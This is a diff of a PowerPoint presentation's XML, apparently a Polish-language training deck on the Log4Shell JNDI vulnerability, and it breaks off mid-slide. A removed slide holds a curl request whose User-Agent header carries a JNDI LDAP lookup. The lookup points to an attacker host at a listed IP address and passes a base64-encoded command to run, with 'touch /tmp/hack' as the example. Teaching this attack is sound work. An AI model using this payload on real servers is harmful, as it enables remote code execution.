-            <a:lvl9pPr marL="4114800" marR="0" lvl="8" indent="-342900" algn="l" rtl="0">
-              <a:lnSpc>
-                <a:spcPct val="90000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="500"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buClr>
-                <a:schemeClr val="dk1"/>
-              </a:buClr>
-              <a:buSzPts val="1800"/>
-              <a:buFont typeface="Arial"/>
-              <a:buChar char="•"/>
-              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:schemeClr val="dk1"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-                <a:ea typeface="Calibri"/>
-                <a:cs typeface="Calibri"/>
-                <a:sym typeface="Calibri"/>
-              </a:defRPr>
-            </a:lvl9pPr>
-          </a:lstStyle>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buSzPts val="2800"/>
-              <a:buFont typeface="Arial"/>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="pl-PL" dirty="0" err="1">
-                <a:latin typeface="Open Sans"/>
-                <a:ea typeface="Open Sans"/>
-                <a:cs typeface="Open Sans"/>
-                <a:sym typeface="Open Sans"/>
-              </a:rPr>
-              <a:t>jndi</a:t>
-            </a:r>
-            <a:endParaRPr lang="pl-PL" dirty="0">
-              <a:latin typeface="Open Sans"/>
-              <a:ea typeface="Open Sans"/>
-              <a:cs typeface="Open Sans"/>
-              <a:sym typeface="Open Sans"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buSzPts val="2800"/>
-              <a:buFont typeface="Arial"/>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr lang="pl-PL" dirty="0">
-              <a:latin typeface="Open Sans"/>
-              <a:ea typeface="Open Sans"/>
-              <a:cs typeface="Open Sans"/>
-              <a:sym typeface="Open Sans"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buSzPts val="2800"/>
-              <a:buFont typeface="Arial"/>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr lang="pl-PL" dirty="0">
-              <a:latin typeface="Open Sans"/>
-              <a:ea typeface="Open Sans"/>
-              <a:cs typeface="Open Sans"/>
-              <a:sym typeface="Open Sans"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="2" name="Equals 1">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2064F15E-CFE3-FA44-B31F-182C05F5D480}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="7145656" y="2754154"/>
-            <a:ext cx="586739" cy="445770"/>
-          </a:xfrm>
-          <a:prstGeom prst="mathEqual">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:style>
-          <a:lnRef idx="2">
-            <a:schemeClr val="accent1">
-              <a:shade val="50000"/>
-            </a:schemeClr>
-          </a:lnRef>
-          <a:fillRef idx="1">
-            <a:schemeClr val="accent1"/>
-          </a:fillRef>
-          <a:effectRef idx="0">
-            <a:schemeClr val="accent1"/>
-          </a:effectRef>
-          <a:fontRef idx="minor">
-            <a:schemeClr val="lt1"/>
-          </a:fontRef>
-        </p:style>
-        <p:txBody>
-          <a:bodyPr rtlCol="0" anchor="ctr"/>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="ctr"/>
-            <a:endParaRPr lang="en-PL">
-              <a:solidFill>
-                <a:schemeClr val="tx1"/>
-              </a:solidFill>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-    <p:extLst>
-      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2305747539"/>
-      </p:ext>
-    </p:extLst>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide21.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:bg>
-      <p:bgPr>
-        <a:blipFill>
-          <a:blip r:embed="rId3">
-            <a:alphaModFix/>
-          </a:blip>
-          <a:stretch>
-            <a:fillRect/>
-          </a:stretch>
-        </a:blipFill>
-        <a:effectLst/>
-      </p:bgPr>
-    </p:bg>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name="Shape 134"/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="135" name="Google Shape;135;p9"/>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="2943225" y="365125"/>
-            <a:ext cx="8410574" cy="1325563"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="ctr" anchorCtr="0">
-            <a:normAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
-              <a:lnSpc>
-                <a:spcPct val="90000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buClr>
-                <a:schemeClr val="dk1"/>
-              </a:buClr>
-              <a:buSzPts val="3800"/>
-              <a:buFont typeface="Open Sans"/>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
               <a:rPr lang="pl-PL" sz="3800" b="1" dirty="0" err="1">
                 <a:latin typeface="Open Sans"/>
                 <a:ea typeface="Open Sans"/>
@@ -20434,7 +20171,7 @@
                 </a:solidFill>
                 <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
               </a:rPr>
-              <a:t>ip</a:t>
+              <a:t>34.118.44.50</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-GB" sz="2000" dirty="0">
@@ -20618,7 +20355,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide22.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide21.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:bg>
@@ -20723,378 +20460,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide23.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:bg>
-      <p:bgPr>
-        <a:blipFill>
-          <a:blip r:embed="rId3">
-            <a:alphaModFix/>
-          </a:blip>
-          <a:stretch>
-            <a:fillRect/>
-          </a:stretch>
-        </a:blipFill>
-        <a:effectLst/>
-      </p:bgPr>
-    </p:bg>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name="Shape 134"/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="135" name="Google Shape;135;p9"/>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="2943225" y="365125"/>
-            <a:ext cx="8410574" cy="1325563"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="ctr" anchorCtr="0">
-            <a:normAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
-              <a:lnSpc>
-                <a:spcPct val="90000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buClr>
-                <a:schemeClr val="dk1"/>
-              </a:buClr>
-              <a:buSzPts val="3800"/>
-              <a:buFont typeface="Open Sans"/>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="pl-PL" sz="3800" dirty="0" err="1"/>
-              <a:t>Execute</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="pl-PL" sz="3800" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="pl-PL" sz="3800" dirty="0" err="1"/>
-              <a:t>command</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="pl-PL" sz="3800" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="pl-PL" sz="3800" dirty="0" err="1"/>
-              <a:t>line</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="pl-PL" sz="3800" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="pl-PL" sz="3800" dirty="0" err="1"/>
-              <a:t>payload</a:t>
-            </a:r>
-            <a:endParaRPr sz="3800" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="136" name="Google Shape;136;p9"/>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="body" idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="2943224" y="1825625"/>
-            <a:ext cx="8761095" cy="4165600"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="t" anchorCtr="0">
-            <a:normAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="63500" lvl="0" indent="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:buClr>
-                <a:srgbClr val="292929"/>
-              </a:buClr>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="pl-PL" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="0070C0"/>
-                </a:solidFill>
-                <a:latin typeface="Arial"/>
-                <a:ea typeface="Arial"/>
-                <a:cs typeface="Arial"/>
-                <a:sym typeface="Arial"/>
-              </a:rPr>
-              <a:t>attackhost</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="pl-PL" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="0070C0"/>
-                </a:solidFill>
-                <a:latin typeface="Arial"/>
-                <a:ea typeface="Arial"/>
-                <a:cs typeface="Arial"/>
-                <a:sym typeface="Arial"/>
-              </a:rPr>
-              <a:t>: 34.118.109.39</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="63500" lvl="0" indent="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:buClr>
-                <a:srgbClr val="292929"/>
-              </a:buClr>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr dirty="0">
-              <a:solidFill>
-                <a:srgbClr val="292929"/>
-              </a:solidFill>
-              <a:latin typeface="Arial"/>
-              <a:ea typeface="Arial"/>
-              <a:cs typeface="Arial"/>
-              <a:sym typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buSzPts val="2800"/>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-GB" dirty="0">
-                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
-              </a:rPr>
-              <a:t>curl -H 'User-Agent:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buSzPts val="2800"/>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-GB" dirty="0">
-                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
-              </a:rPr>
-              <a:t>${</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-GB" dirty="0" err="1">
-                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
-              </a:rPr>
-              <a:t>jndi:ldap</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-GB" dirty="0">
-                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
-              </a:rPr>
-              <a:t>://</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-GB" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="0070C0"/>
-                </a:solidFill>
-                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
-              </a:rPr>
-              <a:t>attackhost</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-GB" dirty="0">
-                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
-              </a:rPr>
-              <a:t>:1389/Basic/Command/Base64/</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-GB" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF0000"/>
-                </a:solidFill>
-                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
-              </a:rPr>
-              <a:t>xxx</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-GB" dirty="0">
-                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
-              </a:rPr>
-              <a:t>}’ localhost:9000</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buSzPts val="2800"/>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr lang="en-GB" dirty="0">
-              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buSzPts val="2800"/>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-GB" dirty="0">
-                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
-              </a:rPr>
-              <a:t>xxx – base64 encoded command to execute</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buSzPts val="2800"/>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-GB" dirty="0">
-                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
-              </a:rPr>
-              <a:t>Np. </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-GB" b="1" dirty="0">
-                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
-              </a:rPr>
-              <a:t>touch /</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
-                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
-              </a:rPr>
-              <a:t>tmp</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-GB" b="1" dirty="0">
-                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
-              </a:rPr>
-              <a:t>/hack</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:lnSpc>
-                <a:spcPct val="90000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="1000"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buClr>
-                <a:schemeClr val="dk1"/>
-              </a:buClr>
-              <a:buSzPts val="2800"/>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr lang="pl-PL" dirty="0">
-              <a:latin typeface="Open Sans"/>
-              <a:ea typeface="Open Sans"/>
-              <a:cs typeface="Open Sans"/>
-              <a:sym typeface="Open Sans"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:lnSpc>
-                <a:spcPct val="90000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="1000"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buClr>
-                <a:schemeClr val="dk1"/>
-              </a:buClr>
-              <a:buSzPts val="2800"/>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr dirty="0">
-              <a:latin typeface="Open Sans"/>
-              <a:ea typeface="Open Sans"/>
-              <a:cs typeface="Open Sans"/>
-              <a:sym typeface="Open Sans"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-    <p:extLst>
-      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4097473106"/>
-      </p:ext>
-    </p:extLst>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide24.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide22.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:bg>
@@ -21293,6 +20659,751 @@
 </p:sld>
 </file>
 
+<file path=ppt/slides/slide23.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:bg>
+      <p:bgPr>
+        <a:blipFill>
+          <a:blip r:embed="rId3">
+            <a:alphaModFix/>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </a:blipFill>
+        <a:effectLst/>
+      </p:bgPr>
+    </p:bg>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 117"/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Rectangle 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA55744A-5B43-F84F-85B8-AB2DEB6E1AF1}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="10458450" y="5634990"/>
+            <a:ext cx="1733550" cy="1131570"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:schemeClr val="bg1"/>
+          </a:solidFill>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="2">
+            <a:schemeClr val="accent6"/>
+          </a:lnRef>
+          <a:fillRef idx="1">
+            <a:schemeClr val="lt1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent6"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="dk1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr lang="en-PL"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="6" name="Rounded Rectangle 5">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7798C0DC-5A20-F548-886C-4392B03FF4A1}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4499333" y="1093125"/>
+            <a:ext cx="1526018" cy="1398850"/>
+          </a:xfrm>
+          <a:prstGeom prst="roundRect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="2">
+            <a:schemeClr val="accent1">
+              <a:shade val="50000"/>
+            </a:schemeClr>
+          </a:lnRef>
+          <a:fillRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr lang="en-PL"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="5" name="Picture 2" descr="malware Icon - Download malware Icon 2481506 | Noun Project">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21FA5449-609E-4E49-B9D5-45231295E1B1}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId4">
+            <a:extLst>
+              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+              </a:ext>
+            </a:extLst>
+          </a:blip>
+          <a:srcRect/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr bwMode="auto">
+          <a:xfrm>
+            <a:off x="4868810" y="1335350"/>
+            <a:ext cx="787064" cy="787064"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:extLst>
+            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
+              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
+                <a:solidFill>
+                  <a:srgbClr val="FFFFFF"/>
+                </a:solidFill>
+              </a14:hiddenFill>
+            </a:ext>
+          </a:extLst>
+        </p:spPr>
+      </p:pic>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="8" name="TextBox 7">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93992B33-0EE2-6248-B363-051159144D81}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4644669" y="2849257"/>
+            <a:ext cx="692818" cy="307777"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="none" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-PL" dirty="0"/>
+              <a:t>x.x.x.x</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="11" name="Rounded Rectangle 10">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB1D6E58-83AD-984D-8347-CBA62FEA40E8}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="8512616" y="1093125"/>
+            <a:ext cx="1526018" cy="1398850"/>
+          </a:xfrm>
+          <a:prstGeom prst="roundRect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="2">
+            <a:schemeClr val="accent1">
+              <a:shade val="50000"/>
+            </a:schemeClr>
+          </a:lnRef>
+          <a:fillRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr lang="en-PL"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="1032" name="Picture 8" descr="Animal, bug, insect, virus, virus bug icon icon - Download on Iconfinder">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01F1B619-DAE5-6145-B579-10C7B21E6BDF}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId5">
+            <a:extLst>
+              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+              </a:ext>
+            </a:extLst>
+          </a:blip>
+          <a:srcRect/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr bwMode="auto">
+          <a:xfrm>
+            <a:off x="8951649" y="1399018"/>
+            <a:ext cx="647952" cy="647952"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:extLst>
+            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
+              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
+                <a:solidFill>
+                  <a:srgbClr val="FFFFFF"/>
+                </a:solidFill>
+              </a14:hiddenFill>
+            </a:ext>
+          </a:extLst>
+        </p:spPr>
+      </p:pic>
+      <p:sp>
